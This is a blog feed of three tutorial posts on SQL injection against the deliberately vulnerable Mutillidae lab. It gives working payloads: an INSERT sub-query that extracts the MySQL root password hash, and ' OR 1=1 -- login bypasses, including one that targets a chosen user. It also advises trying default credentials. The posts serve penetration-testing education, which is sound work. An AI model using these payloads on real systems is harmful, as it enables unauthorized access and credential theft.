tag:blogger.com,1999:blog-17795173505798813552024-03-13T18:24:38.516-07:00Bitcrack Educational BlogEducational Cyber Security Articles for the CommunityDimitrihttp://www.blogger.com/profile/12282994399370434479noreply@blogger.comBlogger20125tag:blogger.com,1999:blog-1779517350579881355.post-15249110844555435812016-11-02T08:22:00.000-07:002016-11-02T08:31:03.842-07:00Mutillidae OWASP Top 10: A1 Injection - SQLi Insert Injection <div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: "trebuchet ms" , sans-serif;">Head over to:</span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;">
<span style="font-family: "trebuchet ms" , sans-serif; line-height: 107%;">OWASP Top 10 > A1
Injection > SQLi - Insert Injection > Register </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="line-height: 107%;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">This page is vulnerable to 2 types of attacks. An SQL insert injection attack and a cross-site scripting </span><span style="font-family: "trebuchet ms" , sans-serif;">(XSS)</span><span style="font-family: "trebuchet ms" , sans-serif;"> attack. We will look at the latter in the coming articles. </span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-HmICChZSPgM/WBoDXdoso5I/AAAAAAAACv0/aBZ4vZd6U0su3neFtoU1pMiC217tKy6nACEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://1.bp.blogspot.com/-HmICChZSPgM/WBoDXdoso5I/AAAAAAAACv0/aBZ4vZd6U0su3neFtoU1pMiC217tKy6nACEw/s400/1.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">
<span style="font-family: "trebuchet ms" , sans-serif;">As usual, lets create errors by using an apostrophe( ' ).</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-OPfe5DgKto4/WBoDXpWcM_I/AAAAAAAACv8/Cnc7TOZWIWYCdyA08qSQN_54ddZE-dzwwCLcB/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://3.bp.blogspot.com/-OPfe5DgKto4/WBoDXpWcM_I/AAAAAAAACv8/Cnc7TOZWIWYCdyA08qSQN_54ddZE-dzwwCLcB/s400/2.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Looks like a very simple SQL INSERT query. The page inserts the 'username', 'password' and 'mysignature' into the accounts table. The same table from which we dumped data <a href="http://edublog.bitcrack.net/2016/10/mutillidae-owasp-top-10-a1-injection.html" target="_blank">here</a>. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">The idea behind this type of an attack, is to insert a 'sub-query' within the main insert query. And the results will be shown in any message box or text field that the page pops to confirm a successful entry or in any other places that display the related information from the database. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;">The most basic example for this is the green text box above the form tells us that the account is created:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-0X9DO0xLPE8/WBoDX8E-4pI/AAAAAAAACwA/59bjnpMRbyEDUYwW_HzvrM6C8nkhxSXIwCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://4.bp.blogspot.com/-0X9DO0xLPE8/WBoDX8E-4pI/AAAAAAAACwA/59bjnpMRbyEDUYwW_HzvrM6C8nkhxSXIwCEw/s400/3.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">We can also retrieve the user information from the user-info.php page. Where the username, password and signature can be retrieved with correct credentials. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The green text box cannot be used for retrieving our sub-query results because it only displays the username field which doesn't give us much room to probe as the first quote(') for the input value is part of the insert query.</span></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-uhxueI7nZVU/WBoDXTnrPCI/AAAAAAAACv4/oPM2Gcl6LP4nwFjccCVaZL8wPZRe46j4ACEw/s1600/2%2B-%2BCopy.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://3.bp.blogspot.com/-uhxueI7nZVU/WBoDXTnrPCI/AAAAAAAACv4/oPM2Gcl6LP4nwFjccCVaZL8wPZRe46j4ACEw/s400/2%2B-%2BCopy.PNG" width="400" /></a></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The password field can also not be used for the sub-query because we will need it to successfully retrieve user info from the user-info page. </span></li>
</ul>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Which leaves us with only the signature field. This is an ideal field because it will be shown back to us upon submitting valid credentials at the user-info.php page. </span></li>
</ul>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">Lets try to retrieve the password for the <b>mysql "root" user</b>.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Currently, the query looks like this:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">INSERT INTO accounts (username, password, mysignature) VALUES ('",",")</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;">Note: 3 quotes after 'values' is because with put an apostrophe to create an error</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: trebuchet ms, sans-serif;">Sub-query to retrieve mysql's root user password:</span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT password FROM mysql.user WHERE user="root"</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;">This is our subquery to retrieve mysql root user password</span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Sub-query into main query</span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">INSERT INTO accounts (username, password, mysignature) VALUES ('x','x',(select password from myql.user where user="root")) -- </span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Break down:</span></div>
<div style="text-align: left;">
</div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">VALUES ('x','x', - this is the username and password. </span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">followed by subquery</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">) -- - closes the statement and comments out everything after it. </span></li>
</ul>
<div style="text-align: center;">
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>Our malicious string</i></span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">x','x',(select password from myql.user where user="root")) --</span></div>
</div>
<div>
<div style="text-align: left;">
<span style="text-align: center;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Attack: </span><span style="font-family: "trebuchet ms" , sans-serif;">Insert malicious string into username textbox</span></div>
</div>
</div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BiUO-1-HeIk/WBoDXzQHCfI/AAAAAAAACwE/H9hy2Y9WcocT1hvdUQkxSmBpFNrry1nIgCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://1.bp.blogspot.com/-BiUO-1-HeIk/WBoDXzQHCfI/AAAAAAAACwE/H9hy2Y9WcocT1hvdUQkxSmBpFNrry1nIgCEw/s400/4.PNG" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Confirm successful entry</span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<br /></div>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-DYZd46BATzk/WBoDYGVkIrI/AAAAAAAACwI/3HDN4-UXlikxfsKlfzgSXCmaNGNlmNPMQCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="36" src="https://4.bp.blogspot.com/-DYZd46BATzk/WBoDYGVkIrI/AAAAAAAACwI/3HDN4-UXlikxfsKlfzgSXCmaNGNlmNPMQCEw/s400/5.PNG" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
</div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Head over over to:</span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">OWASP Top 10 - A1 Injection - SQLi Extract Data - User Info</span></div>
</div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Enter your newly created account with username=x and password=x</span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-S1iq2lWkXmI/WBoDYfXUwyI/AAAAAAAACwM/Z5MHaWa4ZuQMTy6tl1Rq1Vsc04F1A9F_QCEw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://1.bp.blogspot.com/-S1iq2lWkXmI/WBoDYfXUwyI/AAAAAAAACwM/Z5MHaWa4ZuQMTy6tl1Rq1Vsc04F1A9F_QCEw/s400/6.PNG" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">The signature is an MD5 hash of the root user's password. </span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">To be able to use the password hash, you first need to crack the password to get it in clear-text. </span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div style="text-align: center;">
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Please note: the mysql.root user password is very different from the passwords we had dumped earlier from this page. The root user password unlocks more doors for you.</span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</span></div>
</div>
</div>
Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-18095605244628975302016-10-17T01:42:00.000-07:002016-10-17T01:42:09.796-07:00Mutillidae OWASP Top 10: A1 Injection - SQLi Bypass Authentication <span style="font-family: Trebuchet MS, sans-serif;">We have looked at a simple extracting data technique from our <a href="http://edublog.bitcrack.net/2016/10/mutillidae-owasp-top-10-a1-injection.html" target="_blank">previous article</a>. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Now lets look at a simple bypassing authentication technique.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Head over to:</span><br />
<span style="font-family: Trebuchet MS, sans-serif;">OWASP Top 10 > A1 Injection > SQLi - Bypass Authentication > Login</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">The page looks very similar to the previous article, except what this page does is it logs you in to the system instead of showing information. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Follow the previous article on how to cause an error with an apostrophe ( ' ). And you can notice that the SQL query is the same as we have seen before. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-s206BJXUaBQ/WASOJtsvarI/AAAAAAAACtY/-WAlKjH4CAY9aCOGpk9boaATthciTjefQCEw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://3.bp.blogspot.com/-s206BJXUaBQ/WASOJtsvarI/AAAAAAAACtY/-WAlKjH4CAY9aCOGpk9boaATthciTjefQCEw/s400/1.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">This means we can still use our previous string ( ' OR 1=1 -- ) here. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Enter the string in the name field, </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Pz9QbXrkhjE/WASOJoM_FVI/AAAAAAAACtQ/wZnC9dsoJCIMiYGswLyQRfFZ88khu1WQgCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://1.bp.blogspot.com/-Pz9QbXrkhjE/WASOJoM_FVI/AAAAAAAACtQ/wZnC9dsoJCIMiYGswLyQRfFZ88khu1WQgCEw/s400/2.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">and Voila! your logged in as admin. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">You are logged in as admin because that is the first record in the accounts table. In the real world, that may not be the case. So we need to target our attack a little bit to log in as a user of our choosing.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Lets try and log in as "john". We know that he is the 3rd user in the accounts table from our previous hack. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">The technique is still simple and similar with a slight change. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<h3>
<span style="font-family: Trebuchet MS, sans-serif;">Logging in as a specific user</span></h3>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">We know that the below string is a TRUE statement and that it logs us in with the first user on the accounts table who is admin. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif;">SELECT * FROM accounts WHERE username= ' OR 1=1 -- </span></div>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"><i>TRUE Statement</i></span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">We can modify this with one more operator. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">From the statement, we can see that the users under the "username" column and that everything after the OR operator should be TRUE for it to work. We can add an "AND" operator with the username specified. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif;">SELECT * FROM accounts WHERE username=' OR (1=1 AND username = 'john') -- </span></div>
<div style="text-align: center;">
<span style="font-family: Trebuchet MS, sans-serif; font-size: x-small;"><i>Still TRUE statement</i></span></div>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Breakdown:</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /><ul>
<li>The first apostrophe ( ' ) makes the username input blank. The statement is currently false.</li>
<li>But the "OR" operator tells the statement if anything after it is true, then the whole statement becomes true. </li>
<li>"1=1" is a true condition. Just like 2 = 2 or 100 = 100. </li>
<li><a href="http://www.w3schools.com/sql/sql_and_or.asp" target="_blank">The "AND" operator</a> allows to add another condition. Follow <a href="http://dev.mysql.com/doc/refman/5.7/en/logical-operators.html" target="_blank">link for more info</a>. </li>
<li>""username" = 'john'" is true because from our <a href="http://edublog.bitcrack.net/2016/10/mutillidae-owasp-top-10-a1-injection.html" target="_blank">extract data</a> tutorial, there is a "john" user account from the 16 accounts displayed. </li>
<li>With both the conditions around the "AND" operator being true turns the whole statement to TRUE. </li>
<li>The "--" tells the query to ignore out everything after it. </li>
</ul>
</span><span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">Right click on the name field and click on Inspect Element. Here we will change the "Maxlength" to 50 so as to fit our new string.</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-l135kxj6euk/WASOJjqKF3I/AAAAAAAACtU/hX8mAv4bk8wMPrprqPbn2Tm0M7CJ-4oUwCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://2.bp.blogspot.com/-l135kxj6euk/WASOJjqKF3I/AAAAAAAACtU/hX8mAv4bk8wMPrprqPbn2Tm0M7CJ-4oUwCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">And enter the new string on the name field. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-x4dE2qsePpQ/WASOKDsIENI/AAAAAAAACtg/JPu4DlIbbi8JlvURH91LUN33mhyTmcWGQCEw/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://2.bp.blogspot.com/-x4dE2qsePpQ/WASOKDsIENI/AAAAAAAACtg/JPu4DlIbbi8JlvURH91LUN33mhyTmcWGQCEw/s400/4.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">You've logged in a John! :)</span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-QQE0n6UfhxE/WASOKCBsEuI/AAAAAAAACtc/0GlK7Uif4g0G4co3CoYYcMLXTSrAHJuHgCEw/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://4.bp.blogspot.com/-QQE0n6UfhxE/WASOKCBsEuI/AAAAAAAACtc/0GlK7Uif4g0G4co3CoYYcMLXTSrAHJuHgCEw/s400/5.PNG" width="400" /></a></div>
<br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">If you got an error that means you dint leave a space at the end of your "--". So make sure to leave a single space character after it. </span><br />
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;"><br /></span>
<span style="font-family: Trebuchet MS, sans-serif;">-<i>Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span>Jayeshhttp://www.blogger.com/profile/00209381489830183839noreply@blogger.com0tag:blogger.com,1999:blog-1779517350579881355.post-60362010499722593892016-10-14T06:48:00.000-07:002016-10-17T01:42:59.094-07:00Mutillidae OWASP Top 10: A1 Injection - SQLi Extract Data<span style="font-family: "trebuchet ms" , sans-serif;">We can start web penetration testing on <a href="https://sourceforge.net/projects/metasploitable/files/Metasploitable2/" target="_blank">Metasploitable 2</a> by accessing <a href="https://sourceforge.net/projects/mutillidae/" target="_blank">Mutillidae</a> over from the web browser of the Kali attacker machine.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Enter the address: <<metasploitable 2 IP address>>/ mutillidae</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Mutillidae comes with all of the <a href="https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet" target="_blank">OWASP top 10 vulnerabilities</a> found on real websites. You can safely practice on common web vulnerabilities on Mutillidae to give you a strong foundation of basic web attacks. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">We will exploit the web vulnerabilities in a sequence starting with A1.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Browse over to OWASP Top 10 > A1 - Injection > SQLi - Extract Data > User Info page. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://www.owasp.org/index.php/SQL_Injection" target="_blank">SQLi</a> is a type of web attack whereby an attacker will insert an SQL query that will talk with the database of the application and can reveal/retrieve an entire database in favorable cases. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Lets take a look at the most basic SQL Injection technique.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">If you have browsed over to the user info page, it should look like this</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-EdWlJ_-8dog/WADgkgTi0RI/AAAAAAAACsw/D8dbOVzP0xogZ9KoAdXs_JwGLZKhIroKgCLcB/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="227" src="https://2.bp.blogspot.com/-EdWlJ_-8dog/WADgkgTi0RI/AAAAAAAACsw/D8dbOVzP0xogZ9KoAdXs_JwGLZKhIroKgCLcB/s400/1.PNG" width="400" /></span></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">A simple form with a username and password field. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Trial and Error with Default Credentials</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">When you see such a form, always try out the defualt credentials first. At times you can succeed with default credentials because often they are not changed. for example, username:Admin and password: Admin are the common default passwords. There are tons of default passwords published online for you to try logging in with.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Great resources of default passwords can be gotten at <a href="http://www.phenoelit.org/dpl/dpl.html" target="_blank">phenoelit.org</a> and <a href="http://www.defaultpassword.com/" target="_blank">defaultpassword.com</a>.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Manipulating SQL Query Strings</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Firstly we need to know how the query looks like to be able to manipulate it. Causing errors intentionally on the page can often reveal that information to us. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">On the "name" field enter an apostrophe ( ' ). This will cause an error and give you an output looking like this</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-2mwl-WJWSQM/WADgkpEkG3I/AAAAAAAACs0/P_YgLdfJlQkOliYIvnnLoo8CZSaUPWFHQCEw/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="246" src="https://2.bp.blogspot.com/-2mwl-WJWSQM/WADgkpEkG3I/AAAAAAAACs0/P_YgLdfJlQkOliYIvnnLoo8CZSaUPWFHQCEw/s400/2.PNG" width="400" /></span></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">From the error table, we can clearly see the SQL query that is used. The query needs a username AND password to be able to view details. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT * FROM accounts WHERE username=''' AND password=''</span></div>
<div style="text-align: center;">
<i><span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;">This statement will only be true if you know both the username and password</span></i></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">However since we don't have a username and password, we can simply use comments ( -- ) and an "OR" <a href="http://dev.mysql.com/doc/refman/5.7/en/non-typed-operators.html" target="_blank">SQL operator</a> to make the statement TRUE without needing the username and password. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT * FROM accounts WHERE username= ' OR 1=1 -- password=''</span></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Break down:</span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The first apostrophe ( ' ) makes the username input blank. The statement is currently false.</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">But the "OR" operator tells the statement, if anything after it is true, then the whole query becomes true. </span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">"1=1" is a true condition. Just like 2 = 2 or 100 = 100. </span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">The "--" tells the statement to ignore out everything after it. </span></li>
</ul>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">So our favorable query would look like</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;">SELECT * FROM accounts WHERE username= ' OR 1=1 -- </span></div>
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: x-small;"><i>TRUE statement</i></span></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">On the name field, input: ' OR 1=1 -- </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Do you notice anything below the form? :)</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-6n6dNqim8Zg/WADgkmgmI4I/AAAAAAAACss/FrCBs2rx63Q69POQaR5tRAyQo1pNOaoqgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://2.bp.blogspot.com/-6n6dNqim8Zg/WADgkmgmI4I/AAAAAAAACss/FrCBs2rx63Q69POQaR5tRAyQo1pNOaoqgCEw/s400/3.PNG" width="400" /></a></div>
<br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
